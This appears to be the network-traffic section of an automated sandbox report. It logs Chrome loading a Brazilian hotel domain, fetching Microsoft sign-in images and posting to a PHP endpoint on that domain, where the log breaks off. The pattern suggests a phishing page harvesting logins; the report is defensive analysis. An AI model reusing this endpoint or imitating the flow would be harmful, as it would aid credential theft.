                                              Sep 6, 2023 01:45:31.070099115 CEST49744443192.168.2.413.107.213.69
                                              Sep 6, 2023 01:45:31.070135117 CEST4434974413.107.213.69192.168.2.4
                                              Sep 6, 2023 01:45:31.072848082 CEST49745443192.168.2.413.107.213.69
                                              Sep 6, 2023 01:45:31.072880030 CEST4434974513.107.213.69192.168.2.4
                                              Sep 6, 2023 01:45:31.597891092 CEST44349742184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:31.600723982 CEST44349742184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:31.600862026 CEST49742443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:31.601336002 CEST49742443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:31.601371050 CEST44349742184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:31.613821983 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:31.613886118 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:31.613995075 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:31.614284039 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:31.614314079 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:31.854626894 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:31.854676008 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:31.854896069 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:31.855190992 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:31.855211020 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.088315964 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.089406967 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:32.089430094 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.090464115 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.091110945 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:32.091319084 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.091511011 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:32.134919882 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.385457993 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.409084082 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.409137964 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.412570000 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.412671089 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.414835930 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.415014982 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.415039062 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.415196896 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.455092907 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.455131054 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.496165991 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.589698076 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.592087030 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.592212915 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:32.592336893 CEST49749443192.168.2.4184.171.250.122
                                              Sep 6, 2023 01:45:32.592374086 CEST44349749184.171.250.122192.168.2.4
                                              Sep 6, 2023 01:45:32.718717098 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719100952 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719125986 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719166994 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719222069 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.719274998 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719306946 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.719314098 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.719368935 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.723766088 CEST49750443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.723803997 CEST44349750152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.738607883 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.738689899 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:32.738815069 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.739308119 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:32.739346981 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.263309002 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.263688087 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.263745070 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.264818907 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.265295029 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.265441895 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.265489101 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.305197954 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.607290983 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.607449055 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.607497931 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.607630014 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:33.607660055 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.607660055 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.607726097 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.608613014 CEST49751443192.168.2.4152.199.4.73
                                              Sep 6, 2023 01:45:33.608649969 CEST44349751152.199.4.73192.168.2.4
                                              Sep 6, 2023 01:45:37.465760946 CEST44349735142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:45:37.465895891 CEST44349735142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:45:37.466000080 CEST49735443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:45:39.166233063 CEST49735443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:45:39.166306973 CEST44349735142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:26.897792101 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:26.897867918 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:26.898132086 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:26.899318933 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:26.899363995 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:27.361804008 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:27.362622976 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:27.362668991 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:27.363432884 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:27.364550114 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:27.364825964 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:27.404777050 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:37.345679998 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:37.345817089 CEST44349777142.250.217.132192.168.2.4
                                              Sep 6, 2023 01:46:37.346152067 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:39.170909882 CEST49777443192.168.2.4142.250.217.132
                                              Sep 6, 2023 01:46:39.170958996 CEST44349777142.250.217.132192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 6, 2023 01:45:22.650492907 CEST6028153192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:22.652019978 CEST6343053192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:22.821162939 CEST53602811.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:22.822177887 CEST53634301.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:22.965328932 CEST5877353192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:23.619662046 CEST53587731.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:25.716947079 CEST5074053192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:25.754153967 CEST5107953192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:25.887674093 CEST53507401.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:25.924412966 CEST53510791.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:26.845482111 CEST5997753192.168.2.41.1.1.1
                                              Sep 6, 2023 01:45:27.016804934 CEST53599771.1.1.1192.168.2.4
                                              Sep 6, 2023 01:45:31.666989088 CEST6166053192.168.2.41.1.1.1
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 6, 2023 01:45:22.650492907 CEST192.168.2.41.1.1.10x9126Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:22.652019978 CEST192.168.2.41.1.1.10xf8b8Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:22.965328932 CEST192.168.2.41.1.1.10x793Standard query (0)www.grandehotelbraganca.com.brA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.716947079 CEST192.168.2.41.1.1.10x9e42Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.754153967 CEST192.168.2.41.1.1.10x4ee3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:26.845482111 CEST192.168.2.41.1.1.10x39dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:31.666989088 CEST192.168.2.41.1.1.10xf285Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 6, 2023 01:45:22.821162939 CEST1.1.1.1192.168.2.40x9126No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 6, 2023 01:45:22.821162939 CEST1.1.1.1192.168.2.40x9126No error (0)clients.l.google.com142.250.72.142A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:22.822177887 CEST1.1.1.1192.168.2.40xf8b8No error (0)accounts.google.com142.250.68.45A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:23.619662046 CEST1.1.1.1192.168.2.40x793No error (0)www.grandehotelbraganca.com.brgrandehotelbraganca.com.brCNAME (Canonical name)IN (0x0001)false
                                              Sep 6, 2023 01:45:23.619662046 CEST1.1.1.1192.168.2.40x793No error (0)grandehotelbraganca.com.br184.171.250.122A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.887674093 CEST1.1.1.1192.168.2.40x9e42No error (0)code.jquery.com69.16.175.10A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.887674093 CEST1.1.1.1192.168.2.40x9e42No error (0)code.jquery.com69.16.175.42A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.924412966 CEST1.1.1.1192.168.2.40x4ee3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:25.924412966 CEST1.1.1.1192.168.2.40x4ee3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:27.016804934 CEST1.1.1.1192.168.2.40x39dNo error (0)www.google.com142.250.217.132A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:29.528281927 CEST1.1.1.1192.168.2.40xcd6No error (0)dual.part-0041.t-0009.t-msedge.netpart-0041.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 6, 2023 01:45:29.528281927 CEST1.1.1.1192.168.2.40xcd6No error (0)part-0041.t-0009.t-msedge.net13.107.213.69A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:29.528281927 CEST1.1.1.1192.168.2.40xcd6No error (0)part-0041.t-0009.t-msedge.net13.107.246.69A (IP address)IN (0x0001)false
                                              Sep 6, 2023 01:45:31.837383986 CEST1.1.1.1192.168.2.40xf285No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 6, 2023 01:45:31.837383986 CEST1.1.1.1192.168.2.40xf285No error (0)cs1025.wpc.upsiloncdn.net152.199.4.73A (IP address)IN (0x0001)false
                                              • clients2.google.com
                                              • accounts.google.com
                                              • www.grandehotelbraganca.com.br
                                              • cdnjs.cloudflare.com
                                              • code.jquery.com
                                              • https:
                                              • aadcdn.msauth.net
                                              • aadcdn.msauthimages.net
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.449726142.250.72.142443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:23 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.102&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                              Host: clients2.google.com
                                              Connection: keep-alive
                                              X-Goog-Update-Interactivity: fg
                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                              X-Goog-Update-Updater: chromecrx-104.0.5112.102
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:24 UTC1INHTTP/1.1 200 OK
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-gR9Ho_7gr6pfdOtzlJ_fLg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Tue, 05 Sep 2023 23:45:23 GMT
                                              Content-Type: text/xml; charset=UTF-8
                                              X-Daynum: 6091
                                              X-Daystart: 60323
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              Server: GSE
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2023-09-05 23:45:24 UTC1INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 30 39 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 36 30 33 32 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6091" elapsed_seconds="60323"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                              2023-09-05 23:45:24 UTC2INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                              2023-09-05 23:45:24 UTC2INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449727142.250.68.45443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:23 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                              Host: accounts.google.com
                                              Connection: keep-alive
                                              Content-Length: 1
                                              Origin: https://www.google.com
                                              Content-Type: application/x-www-form-urlencoded
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: CONSENT=YES+srp.gws-20210602-0-RC3.de+FX+536
                                              2023-09-05 23:45:23 UTC1OUTData Raw: 20
                                              Data Ascii:
                                              2023-09-05 23:45:24 UTC2INHTTP/1.1 200 OK
                                              Content-Type: application/json; charset=utf-8
                                              Access-Control-Allow-Origin: https://www.google.com
                                              Access-Control-Allow-Credentials: true
                                              X-Content-Type-Options: nosniff
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Tue, 05 Sep 2023 23:45:24 GMT
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                              Cross-Origin-Opener-Policy: same-origin
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-g6CWaevblehjEIslwsW_vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2023-09-05 23:45:24 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                              Data Ascii: 11["gaia.l.a.r",[]]
                                              2023-09-05 23:45:24 UTC4INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.2.44973913.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC917OUTGET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:30 UTC920INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 199
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: Ibdh8rH9N/WH1yIgI7CSdg==
                                              Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT
                                              ETag: 0x8D79B8374CE7F93
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: 225aacd2-001e-0057-3ff4-df854e000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0wB/3ZAAAAADfdj/INXjWTrpnA+wPSbv0U0pDRURHRTA1MTcAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAADKgda2oVMeTrYIchW26lvrTEFYMzExMDAwMTA4MDM1ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:29 GMT
                                              Connection: close
                                              2023-09-05 23:45:30 UTC921INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.2.44974113.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC917OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:30 UTC921INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 2407
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: nTculR1Fom7eLci0F6rk+A==
                                              Last-Modified: Fri, 11 Mar 2022 11:11:29 GMT
                                              ETag: 0x8DA034FE445C10D
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: d5221ad4-f01e-0028-22f4-dffe51000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0WIH3ZAAAAAA+z5/G0MudTIcUlXTW6uPfU0pDRURHRTA1MTAAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAABrBumve5MjSql89kT+PawOTEFYMzExMDAwMTA4MDE3ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:29 GMT
                                              Connection: close
                                              2023-09-05 23:45:30 UTC922INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              12192.168.2.449742184.171.250.122443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC924OUTPOST /host22/7ffe563.php HTTP/1.1
                                              Host: www.grandehotelbraganca.com.br
